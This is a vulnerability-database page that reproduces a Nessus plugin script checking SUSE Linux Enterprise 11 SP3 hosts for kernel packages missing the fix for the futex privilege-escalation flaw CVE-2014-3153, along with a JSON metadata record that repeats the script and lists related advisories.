Search...

SuSE 11.3 Security Update : Linux Kernel (SAT Patch Numbers 9328 / 9329 / 9330)

2014-06-11T00:00:00

ID SUSE_11_KERNEL-140604.NASL
Type nessus
Reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
Modified 2014-06-11T00:00:00

Description

The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix a critical privilege escalation security issue :

The futex acquisition code in kernel/futex.c can be used to gain ring0 access via the futex syscall. This could be used for privilege escalation by non-root users. (bnc#880892). (CVE-2014-3153)

                                        
                                            #%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from SuSE 11 update information. The text itself is
# copyright (C) Novell, Inc.
#

if (NASL_LEVEL &lt; 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(74462);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2014-3153");

  script_name(english:"SuSE 11.3 Security Update : Linux Kernel (SAT Patch Numbers 9328 / 9329 / 9330)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote SuSE 11 host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix
a critical privilege escalation security issue :

  - The futex acquisition code in kernel/futex.c can be used
    to gain ring0 access via the futex syscall. This could
    be used for privilege escalation by non-root users.
    (bnc#880892). (CVE-2014-3153)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=880892"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2014-3153.html"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Apply SAT patch number 9328 / 9329 / 9330 as appropriate."
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Android "Towelroot" Futex Requeue Kernel Exploit');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-base");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-extra");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-man");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-base");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-source");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-syms");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace-base");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-base");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:xen-kmp-default");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");

  script_set_attribute(attribute:"patch_publication_date", value:"2014/06/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/11");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11");
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" &gt;!&lt; cpu && "s390x" &gt;!&lt; cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", cpu);

pl = get_kb_item("Host/SuSE/patchlevel");
if (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, "SuSE 11.3");


flag = 0;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-default-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-default-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-default-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-default-extra-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-pae-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-pae-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-pae-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-pae-extra-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-source-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-syms-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-trace-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-xen-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-xen-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-xen-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"kernel-xen-extra-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:"xen-kmp-pae-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-default-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-default-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-default-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-default-extra-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-source-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-syms-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-trace-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-xen-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-xen-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-xen-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"kernel-xen-extra-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-default-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-default-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-default-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-source-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-syms-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-trace-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-trace-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, reference:"kernel-trace-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-ec2-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-ec2-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-ec2-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-pae-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-pae-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-pae-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-xen-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-xen-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"kernel-xen-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:"xen-kmp-pae-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"s390x", reference:"kernel-default-man-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-ec2-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-ec2-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-ec2-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-xen-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-xen-base-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"kernel-xen-devel-3.0.101-0.31.1")) flag++;
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "SUSE_11_KERNEL-140604.NASL", "bulletinFamily": "scanner", "title": "SuSE 11.3 Security Update : Linux Kernel (SAT Patch Numbers 9328 / 9329 / 9330)", "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix\na critical privilege escalation security issue :\n\n - The futex acquisition code in kernel/futex.c can be used\n to gain ring0 access via the futex syscall. This could\n be used for privilege escalation by non-root users.\n (bnc#880892). (CVE-2014-3153)", "published": "2014-06-11T00:00:00", "modified": "2014-06-11T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/74462", "reporter": "This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.", "references": ["http://support.novell.com/security/cve/CVE-2014-3153.html", "https://bugzilla.novell.com/show_bug.cgi?id=880892"], "cvelist": ["CVE-2014-3153"], "type": "nessus", "lastseen": "2020-06-05T12:29:08", "edition": 18, "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3153"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:CB87545A2D6E3B6DCF68CD117331BD4E"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13812", "SECURITYVULNS:DOC:30788"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310841845", "OPENVAS:1361412562310123398", "OPENVAS:1361412562310850595", "OPENVAS:1361412562310123400", "OPENVAS:1361412562310850794", "OPENVAS:1361412562310850859", "OPENVAS:1361412562310123399", "OPENVAS:1361412562310120340", "OPENVAS:1361412562310841849", "OPENVAS:1361412562310851102"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-363.NASL", "FEDORA_2014-7128.NASL", "ALA_ALAS-2014-392.NASL", "UBUNTU_USN-2237-1.NASL", "UBUNTU_USN-2238-1.NASL", "REDHAT-RHSA-2014-0800.NASL", "ORACLELINUX_ELSA-2014-3039.NASL", "UBUNTU_USN-2240-1.NASL", "ORACLELINUX_ELSA-2014-3037.NASL", "ORACLELINUX_ELSA-2014-3038.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:42E64B8A7AF8DD130DE81078204DEE28", "THREATPOST:B4267D45B883F6975BE2834CBA5C5B48", "THREATPOST:5E0275127CA36073D1FD4B8A32CAADD6", "THREATPOST:A1F7D2E70C26FAAFD6D382A08D8D7B38", "THREATPOST:DF79B36E4B10187B12FB82AEF22C5EA9", "THREATPOST:B433923D1E04E82EB6DD30772F192222"]}, {"type": "hackerone", "idList": ["H1:13388"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6D7A39DDD9FCE730C1AA0BD07808752A"]}, {"type": "android", "idList": ["ANDROID:TOWELROOT"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-3038", "ELSA-2014-3037", "ELSA-2014-3039"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0796-1", "SUSE-SU-2014:0837-2", "OPENSUSE-SU-2014:0878-1", "SUSE-SU-2014:0837-1", "SUSE-SU-2014:0775-1"]}, {"type": "saint", "idList": ["SAINT:CC7E2B1599949AEEEB57BA20490CBAFE", "SAINT:62CFE302E8E036752E595883D6BF6332", "SAINT:58F657BC1DD46A0850A96857BC5FA43B"]}, {"type": "thn", "idList": ["THN:608C3D3E206B655519193316EAFA2C22", "THN:B13AEDC0DAC18F19211BE2B4BE0C4787", "THN:94A8976C00B182A05720DD5149AC5DE0", "THN:B829D3A52189C266464176E0C3E66EE3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130329"]}, {"type": "ubuntu", "idList": ["USN-2234-1", "USN-2233-1", "USN-2238-1", "USN-2236-1", "USN-2237-1", "USN-2240-1", "USN-2235-1", "USN-2241-1", "USN-2239-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-22925", "1337DAY-ID-23280"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/ANDROID/LOCAL/FUTEX_REQUEUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:35370"]}, {"type": "amazon", "idList": ["ALAS-2014-392", "ALAS-2014-363"]}, {"type": "canvas", "idList": ["LINUX_FUTEX_REQUEUE"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2950-1:15DF5", "DEBIAN:DSA-2949-1:5D47D"]}, {"type": "redhat", "idList": ["RHSA-2014:0800", "RHSA-2014:0900"]}, {"type": "securelist", "idList": ["SECURELIST:52B19EC96333D6EAA616F8D528A8E64A"]}], "modified": "2020-06-05T12:29:08", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-06-05T12:29:08", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74462);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-3153\");\n\n script_name(english:\"SuSE 11.3 Security Update : Linux Kernel (SAT Patch Numbers 9328 / 9329 / 9330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix\na critical privilege escalation security issue :\n\n - The futex acquisition code in kernel/futex.c can be used\n to gain ring0 access via the futex syscall. This could\n be used for privilege escalation by non-root users.\n (bnc#880892). (CVE-2014-3153)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=880892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-3153.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 9328 / 9329 / 9330 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-default-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-default-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-default-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-default-extra-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-source-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-syms-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-trace-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"xen-kmp-pae-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-default-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-default-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-source-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-syms-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"xen-kmp-default-4.2.4_02_3.0.101_0.31-0.7.33\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-default-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-default-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-default-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-source-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-syms-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-trace-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-trace-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"kernel-trace-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.31.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", 